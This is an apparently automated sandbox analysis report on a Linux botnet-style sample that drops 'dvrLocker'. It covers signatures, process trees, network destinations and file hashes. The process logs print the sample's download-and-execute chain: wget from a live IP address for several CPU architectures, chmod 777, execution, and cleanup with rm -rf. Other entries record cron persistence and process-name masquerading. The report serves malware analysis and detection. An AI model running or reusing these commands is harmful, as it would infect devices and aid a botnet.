Malware Analysis Report

2025-05-05 22:02

Sample ID 241127-c5tnhsspcy
Target 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
SHA256 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b

Threat Level: Shows suspicious behavior

The file 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Executes dropped EXE

Creates/modifies Cron job

Enumerates running processes

Changes its process name

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-27 02:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-27 02:39

Reported

2024-11-27 02:42

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

13s

Max time network

131s

Command Line

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown N/A

Processes

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/1012/exe]

/bin/ls

[ls -l /proc/1017/exe]

/bin/ls

[ls -l /proc/1041/exe]

/bin/ls

[ls -l /proc/1047/exe]

/bin/ls

[ls -l /proc/1061/exe]

/bin/ls

[ls -l /proc/1065/exe]

/bin/ls

[ls -l /proc/1067/exe]

/bin/ls

[ls -l /proc/1070/exe]

/bin/ls

[ls -l /proc/1077/exe]

/bin/ls

[ls -l /proc/108/exe]

/bin/ls

[ls -l /proc/1084/exe]

/bin/ls

[ls -l /proc/1088/exe]

/bin/ls

[ls -l /proc/1097/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/1112/exe]

/bin/ls

[ls -l /proc/1113/exe]

/bin/ls

[ls -l /proc/1121/exe]

/bin/ls

[ls -l /proc/1125/exe]

/bin/ls

[ls -l /proc/1129/exe]

/bin/ls

[ls -l /proc/1134/exe]

/bin/ls

[ls -l /proc/1138/exe]

/bin/ls

[ls -l /proc/1143/exe]

/bin/ls

[ls -l /proc/1146/exe]

/bin/ls

[ls -l /proc/1148/exe]

/bin/ls

[ls -l /proc/1151/exe]

/bin/ls

[ls -l /proc/1152/exe]

/bin/ls

[ls -l /proc/1154/exe]

/bin/ls

[ls -l /proc/116/exe]

/bin/ls

[ls -l /proc/1162/exe]

/bin/ls

[ls -l /proc/1165/exe]

/bin/ls

[ls -l /proc/1166/exe]

/bin/ls

[ls -l /proc/1168/exe]

/bin/ls

[ls -l /proc/1173/exe]

/bin/ls

[ls -l /proc/1178/exe]

/bin/ls

[ls -l /proc/1182/exe]

/bin/ls

[ls -l /proc/1184/exe]

/bin/ls

[ls -l /proc/1186/exe]

/bin/ls

[ls -l /proc/1188/exe]

/bin/ls

[ls -l /proc/1191/exe]

/bin/ls

[ls -l /proc/1194/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/1229/exe]

/bin/ls

[ls -l /proc/1239/exe]

/bin/ls

[ls -l /proc/1250/exe]

/bin/ls

[ls -l /proc/1252/exe]

/bin/ls

[ls -l /proc/1266/exe]

/bin/ls

[ls -l /proc/1285/exe]

/bin/ls

[ls -l /proc/1286/exe]

/bin/ls

[ls -l /proc/1293/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/130/exe]

/bin/ls

[ls -l /proc/1303/exe]

/bin/ls

[ls -l /proc/1308/exe]

/bin/ls

[ls -l /proc/1319/exe]

/bin/ls

[ls -l /proc/1331/exe]

/bin/ls

[ls -l /proc/1341/exe]

/bin/ls

[ls -l /proc/1348/exe]

/bin/ls

[ls -l /proc/1370/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/1469/exe]

/bin/ls

[ls -l /proc/1475/exe]

/bin/ls

[ls -l /proc/1476/exe]

/bin/ls

[ls -l /proc/1477/exe]

/bin/ls

[ls -l /proc/1478/exe]

/bin/ls

[ls -l /proc/1480/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/163/exe]

/bin/ls

[ls -l /proc/164/exe]

/bin/ls

[ls -l /proc/165/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/167/exe]

/bin/ls

[ls -l /proc/168/exe]

/bin/ls

[ls -l /proc/169/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/170/exe]

/bin/ls

[ls -l /proc/171/exe]

/bin/ls

[ls -l /proc/172/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/174/exe]

/bin/ls

[ls -l /proc/175/exe]

/bin/ls

[ls -l /proc/176/exe]

/bin/ls

[ls -l /proc/177/exe]

/bin/ls

[ls -l /proc/178/exe]

/bin/ls

[ls -l /proc/179/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/181/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/206/exe]

/bin/ls

[ls -l /proc/207/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/255/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/276/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/30/exe]

/bin/ls

[ls -l /proc/31/exe]

/bin/ls

[ls -l /proc/32/exe]

/bin/ls

[ls -l /proc/334/exe]

/bin/ls

[ls -l /proc/336/exe]

/bin/ls

[ls -l /proc/34/exe]

/bin/ls

[ls -l /proc/35/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/415/exe]

/bin/ls

[ls -l /proc/421/exe]

/bin/ls

[ls -l /proc/425/exe]

/bin/ls

[ls -l /proc/433/exe]

/bin/ls

[ls -l /proc/439/exe]

/bin/ls

[ls -l /proc/440/exe]

/bin/ls

[ls -l /proc/441/exe]

/bin/ls

[ls -l /proc/444/exe]

/bin/ls

[ls -l /proc/451/exe]

/bin/ls

[ls -l /proc/457/exe]

/bin/ls

[ls -l /proc/462/exe]

/bin/ls

[ls -l /proc/464/exe]

/bin/ls

[ls -l /proc/465/exe]

/bin/ls

[ls -l /proc/466/exe]

/bin/ls

[ls -l /proc/468/exe]

/bin/ls

[ls -l /proc/485/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/515/exe]

/bin/ls

[ls -l /proc/518/exe]

/bin/ls

[ls -l /proc/524/exe]

/bin/ls

[ls -l /proc/532/exe]

/bin/ls

[ls -l /proc/544/exe]

/bin/ls

[ls -l /proc/568/exe]

/bin/ls

[ls -l /proc/595/exe]

/bin/ls

[ls -l /proc/596/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/632/exe]

/bin/ls

[ls -l /proc/650/exe]

/bin/ls

[ls -l /proc/652/exe]

/bin/ls

[ls -l /proc/662/exe]

/bin/ls

[ls -l /proc/665/exe]

/bin/ls

[ls -l /proc/670/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/712/exe]

/bin/ls

[ls -l /proc/716/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/84/exe]

/bin/ls

[ls -l /proc/85/exe]

/bin/ls

[ls -l /proc/867/exe]

/bin/ls

[ls -l /proc/89/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/ls

[ls -l /proc/917/exe]

/bin/ls

[ls -l /proc/934/exe]

/bin/ls

[ls -l /proc/949/exe]

/bin/ls

[ls -l /proc/962/exe]

/bin/ls

[ls -l /proc/968/exe]

/bin/ls

[ls -l /proc/98/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
US 151.101.193.91:443 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
GB 195.181.164.17:443 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/tmp/lib/dvrLocker

MD5 d09db60a70d5b53b5b53ad39476fd7e8
SHA1 73a75e5e8200f77d857a7256cc0979077e29241d
SHA256 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512 ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

/tmp/lib/dvrLocker

MD5 f812a7b3a877f717eb6e54b843b41848
SHA1 21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA256 9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512 c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

/tmp/lib/dvrLocker

MD5 c6f057c974b24f6abdac5b76b10040b9
SHA1 80295c6fdf8fff202829732e58428d656b38f6bd
SHA256 4e114c1111ecdaf0a7622a347c025cd3f9584be170b129113d836a2a5a7c169f
SHA512 23a3bda5842b7e4e0abb6601c5c692d88ebe70c9ebe292d58ee5731aa34647b277ba46b893bcc2481be510442170118e29294a604c6ec296a2712316d09261e6

/tmp/lib/dvrLocker

MD5 b1a1559b205459098f1fff627d35c808
SHA1 983f62052375084a8c125353e0c25b7cd19bd369
SHA256 e4837942ba2584de61bc3a75eba74f4eb0a137a7807130553c42d470c3ec01da
SHA512 3bb8ec38b6f3d17f7c7307785f609031b30056da380377bce27bdd48678cbbc81c4b7203ff511794ec6d23644952a82fa471e13149c014a91378f08305e6f60d

/mnt/dvrLocker

MD5 45c898246a8ffe0b7cc20fe25669da04
SHA1 5ae935186b80f6beb84926d57337d5c0b9e3e1fc
SHA256 1b0846e58fbb6a0e72d25edb81ec94961c0c7048a4e6f26876660f5a26675c77
SHA512 ca75fb8ae0aa7977132c2888ff226f712f4e66f542ab121bcffdc3b3a912b906870b55d6415dfc60c133574739a71c1e5177418dd275d208f43d6ffc09c14636

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-27 02:39

Reported

2024-11-27 02:42

Platform

debian9-armhf-20240729-en

Max time kernel

150s

Max time network

138s

Command Line

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 168.235.111.72 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.7ecNDm /usr/bin/crontab N/A

Enumerates running processes

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [watchdog/0] /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/868/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/832/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/844/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/860/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/853/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/823/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/846/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/850/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/819/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/820/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/835/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/867/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/848/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/855/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/866/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/830/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/837/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/839/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/862/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/875/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/mounts /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/864/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/876/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/826/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/829/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/840/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/788/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/854/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/871/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/872/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown N/A

Processes

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/103/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/111/exe]

/bin/ls

[ls -l /proc/113/exe]

/bin/ls

[ls -l /proc/114/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/140/exe]

/bin/ls

